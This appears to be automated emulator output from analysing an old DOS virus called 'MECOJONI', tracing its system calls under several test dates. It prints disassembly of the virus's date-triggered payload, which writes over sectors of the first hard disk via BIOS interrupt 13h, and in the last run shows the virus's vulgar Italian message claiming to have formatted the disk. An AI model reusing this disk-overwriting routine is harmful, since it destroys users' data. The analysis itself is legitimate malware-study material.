{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":356,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T11:40:48.306716997Z | 74 | PC: 12d1b | Reallocate memory |
| 2018-12-25T11:40:48.309313751Z | 72 | PC: 12d22 | Allocate memory |
| 2018-12-25T11:40:48.311684121Z | 42 | PC: 13461 | Get date 0x13461: cmp dl, 0x19 0x13464: jl 0x13496 0x13466: cmp al, 6 0x13468: jne 0x13496 0x1346a: mov dl, 0x80 0x1346c: mov dh, 0 0x1346e: mov ch, 0 0x13470: mov cl, 1 0x13472: mov al, 9 0x13474: mov ah, 3 0x13476: int 0x13 0x13478: mov dl, 0x80 0x1347a: mov dh, 1 0x1347c: mov ch, 0 0x1347e: mov cl, 1 0x13480: mov al, 9 0x13482: mov ah, 3 0x13484: int 0x13 0x13486: mov dx, 0x347 0x13489: mov ah, 9 |
| 2018-12-25T11:40:48.314514231Z | 72 | PC: 13262 | Allocate memory |
| 2018-12-25T11:40:48.316653317Z | 75 | PC: 1329d | Execute program |
| 2018-12-25T11:40:48.336115375Z | 76 | PC: 13934 | Terminate with return code (Return code = '0') |
| 2018-12-25T11:40:48.33947685Z | 53 | PC: 132b1 | Get interrupt vector (Interrupt = '33' AKA 'Random read') |
| 2018-12-25T11:40:48.341009393Z | 37 | PC: 132c8 | Set interrupt vector (Interrupt = '33' AKA 'Random read') |
| 2018-12-25T11:40:48.34281386Z | 77 | PC: 132cc | Get program return code |
| 2018-12-25T11:40:48.344241182Z | 49 | PC: 132d3 | Terminate and stay resident (Return code = '0' | Memory size = '96') |
{"DateBased":true,"Day":25,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":356,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T11:40:48.411649184Z | 74 | PC: 12d1b | Reallocate memory |
| 2018-12-25T11:40:48.413617243Z | 72 | PC: 12d22 | Allocate memory |
| 2018-12-25T11:40:48.416477666Z | 42 | PC: 13461 | Get date 0x13461: cmp dl, 0x19 0x13464: jl 0x13496 0x13466: cmp al, 6 0x13468: jne 0x13496 0x1346a: mov dl, 0x80 0x1346c: mov dh, 0 0x1346e: mov ch, 0 0x13470: mov cl, 1 0x13472: mov al, 9 0x13474: mov ah, 3 0x13476: int 0x13 0x13478: mov dl, 0x80 0x1347a: mov dh, 1 0x1347c: mov ch, 0 0x1347e: mov cl, 1 0x13480: mov al, 9 0x13482: mov ah, 3 0x13484: int 0x13 0x13486: mov dx, 0x347 0x13489: mov ah, 9 |
| 2018-12-25T11:40:48.418943484Z | 72 | PC: 13262 | Allocate memory |
| 2018-12-25T11:40:48.420689907Z | 75 | PC: 1329d | Execute program |
| 2018-12-25T11:40:48.438893679Z | 76 | PC: 13934 | Terminate with return code (Return code = '0') |
| 2018-12-25T11:40:48.442519633Z | 53 | PC: 132b1 | Get interrupt vector (Interrupt = '33' AKA 'Random read') |
| 2018-12-25T11:40:48.444580035Z | 37 | PC: 132c8 | Set interrupt vector (Interrupt = '33' AKA 'Random read') |
| 2018-12-25T11:40:48.447327806Z | 77 | PC: 132cc | Get program return code |
| 2018-12-25T11:40:48.448887827Z | 49 | PC: 132d3 | Terminate and stay resident (Return code = '0' | Memory size = '96') |
{"DateBased":true,"Day":26,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":356,"SideJobID":0}
.
GIF
Syscalls:
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-25T11:40:48.457399695Z | 74 | PC: 12d1b | Reallocate memory |
| 2018-12-25T11:40:48.459095681Z | 72 | PC: 12d22 | Allocate memory |
| 2018-12-25T11:40:48.460577348Z | 42 | PC: 13461 | Get date 0x13461: cmp dl, 0x19 0x13464: jl 0x13496 0x13466: cmp al, 6 0x13468: jne 0x13496 0x1346a: mov dl, 0x80 0x1346c: mov dh, 0 0x1346e: mov ch, 0 0x13470: mov cl, 1 0x13472: mov al, 9 0x13474: mov ah, 3 0x13476: int 0x13 0x13478: mov dl, 0x80 0x1347a: mov dh, 1 0x1347c: mov ch, 0 0x1347e: mov cl, 1 0x13480: mov al, 9 0x13482: mov ah, 3 0x13484: int 0x13 0x13486: mov dx, 0x347 0x13489: mov ah, 9 |
| 2018-12-25T11:40:48.796415187Z | 9 | PC: 1348d | Display string (String= 'Ti sentivi sicuro. Avevi lo SCAN !!! Invece lo hai preso nel culo. Infatti il') |
| 2018-12-25T11:40:48.803118439Z | 9 | PC: 13494 | Display string (String= 'virus MECOJONI ti ha formattato l Hard disk. MECOJONI � un virus self-modifying!') |